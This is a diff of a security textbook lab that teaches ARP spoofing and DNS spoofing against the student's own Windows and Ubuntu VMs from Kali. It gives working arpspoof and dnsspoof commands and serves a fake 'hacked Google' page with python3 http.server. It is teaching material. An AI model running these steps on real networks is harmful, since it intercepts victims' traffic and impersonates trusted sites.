dhammon/AttacksAndCountermeasures/textbook/04-NetworkServices.md

 > Identify the IP address of the Kali VM and add it to a `dns.txt` file for www.google.com.
 Make sure to replace `IP` with the IP address of the Kali VM.
 > ```bash
 > ip a
-> echo “IP www.google.com” > dns.txt
+> echo “KALI_IP_HERE google.com” > dns.txt
 > ```
-> Configure the Kali VM to forward IP addresses that will be used in the MitM attack.
-You will switch the user to root, set the process ip_forward flag to 1, and exit the root terminal.
-> ```bash
-> sudo su -
-> echo 1 > /proc/sys/net/ipv4/ip_forward
-> exit
-> ```
-> With the Kali VM set to forward IP addresses, and while in a user terminal (not root), spoof the arp resolution between the Windows to Ubuntu VMs.
+> Next, spoof the arp resolution between the Windows to Ubuntu VMs.
 Make sure to replace the `WIN_IP` with the IP address of the Windows VM and the `UBUNTU_IP` with the IP address of the Ubuntu VM.
 > ```bash
 > sudo arpspoof -t WIN_IP UBUNTU_IP
 > ```
-> With Windows and Ubuntu traffic being spoofed, launch another Kali terminal and spoof the traffic between the Ubuntu and Windows VMs (opposite traffic flow from the last command).
-Make sure to replace the `WIN_IP` and the `UBUNTU_IP` IP addresses with the respective VM IP addresses.
+> You should have one Kali terminal opened that is spoofing traffic between the Ubuntu and Windows VMs.
+Next, open a second terminal and identify the network interface of the Kali VM (might be eth0).
 > ```bash
-> sudo arpspoof -t UBUNTU_IP WIN_IP
-> ```
-> You should have two Kali terminals opened and each spoofing traffic between the Ubuntu and Windows VMs.
-Next, open a third terminal and identify the network interface of the Kali VM (might be eth0).
-> ```bash
 > ip a
 > ```
-> Within the third terminal opened, launch the `dnsspoof` attack.
+> Within the second terminal opened, launch the `dnsspoof` attack.
 Make sure to replace the `INTERFACE` in the command with the name of the interface identified in the previous command.
 > ```bash
 > sudo dnsspoof -i INTERFACE -f dns.txt
 > ```
+> Open a third terminal and configure a malicious spoof page to be served to the victim.
+Make sure to enter your name in the YOUR_NAME section.
+> ```bash
+> mkdir www
+> cd www
+> echo "YOUR_NAME hacked Google" > index.html
+> python3 -m http.server 80
+> ```
 > #### Step 4 - Trigger Attack
 > With the Kali VM spoofing traffic between the Windows and Ubuntu VMs, you are ready to observe the results of the attack.
-If successful, you should see that www.google.com now resolves to the Kali VM's IP address.
-From the Windows VM terminal, lookup the IP address of www.google.com
+If successful, you should see that google.com now resolves to the Kali VM's IP address.
+From the Windows VM terminal, lookup the IP address of google.com
 > ```bash
-> nslookup www.google.com
+> nslookup google.com
 > ```
-> You should observe that www.google.com resolves to the Kali VM IP address.
+> You should observe that google.com resolves to the Kali VM IP address.
 If not, consider the following:
 > - Review your configurations
 > - Flush local DNS cache in the Windows VM with the following command: `ipconfig /flushdns`
 > - Sometimes Windows will resort to IPv6 for DNS resolution, consider disabling it in the Ethernet properties.
 > - Wait a few minutes and try again
+>
+>Lastly, open a terminal and navigate to `http://google.com` to confirm your malicious Google page is rendered to the victim.
 > #### Step 5 - Decommission
 > After you have completed the lab, make sure to revert changes made to your Windows VM.
 Consider restoring from a previous snapshot or manually turning the Firewall profiles on and removing the manual DNS server IP address on the Ethernet interface.